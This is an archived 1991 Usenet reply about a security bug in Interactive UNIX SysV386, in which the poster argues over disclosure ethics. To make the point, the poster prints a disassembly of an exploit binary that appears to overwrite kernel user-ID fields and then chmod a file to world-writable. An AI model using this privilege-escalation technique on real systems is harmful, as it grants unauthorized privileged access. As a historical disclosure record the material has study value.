Path: utzoo!utgpu!news-server.csri.toronto.edu!bonnie.concordia.ca!uunet!fub!dobag.in-berlin.de!lumpi From: lumpi@dobag.in-berlin.de (Joern Lubkoll) Newsgroups: comp.unix.sysv386 Subject: Re: SECURITY BUG IN INTERACTIVE UNIX SYSV386 Keywords: BAD BUG Message-ID: Date: 16 Feb 91 11:46:20 GMT References: <1991Feb12.085747.8468@specialix.co.uk> <27B93F44.5606@tct.uucp> <6027@unix386.Convergent.COM> <1991Feb15.134715.16979@virtech.uucp> Organization: Dobag Computer Systems Berlin Lines: 47 cpcahil@virtech.uucp (Conor P. Cahill) writes: > 2. I wholeheartly DISAGREE with you posting the source code which > performs the security bypass. You could have just posted the > uuencoded binary which would have been enough to prove your point > without making it extremely easy for any two bit user to obtain > privileged access. Yes a dedicated hacker could have decoded > your explanation and/or the binary and figure out how to replicate > your code, but the number of those is MUCH less than the number > of people who can now violate the security of the system using > your posted code. > POSTING THE CODE WAS DEAD WRONG. Everyone being able to use debugger or the disassembler, will be able to get the information out of the binary ! lets look at the disassembly (done on isc 2.21): --- BEGINS HERE --- **** DISASSEMBLER **** disassembly for toete section .text [startup code deleted] 11e: c7 45 fc 00 00 00 e0 movl $0xe0000000,0xfc(%ebp) 125: 8b 45 fc movl 0xfc(%ebp),%eax 128: 66 c7 80 ea 10 00 00 00 00 movw $0x0,0x10ea(%eax) 131: 8b 45 fc movl 0xfc(%ebp),%eax 134: 66 c7 80 ec 10 00 00 00 00 movw $0x0,0x10ec(%eax) 13d: 8b 45 fc movl 0xfc(%ebp),%eax 140: 66 c7 80 ee 10 00 00 00 00 movw $0x0,0x10ee(%eax) 149: 8b 45 fc movl 0xfc(%ebp),%eax 14c: 66 c7 80 f0 10 00 00 00 00 movw $0x0,0x10f0(%eax) 155: 68 b6 01 00 00 pushl $0x1b6 15a: 68 a0 03 40 00 pushl $0x4003a0 15f: e8 0c 00 00 00 call 0xc <170> /* CHMOD */ 164: 83 c4 08 addl $0x8,%esp 167: c9 leave 168: c3 ret [Library functions deleted] Don't you think, this is enough for anyone to see, whats going on ? jl -- lumpi@dobag.in-berlin.de -- "Nothing is the complete absence of everything."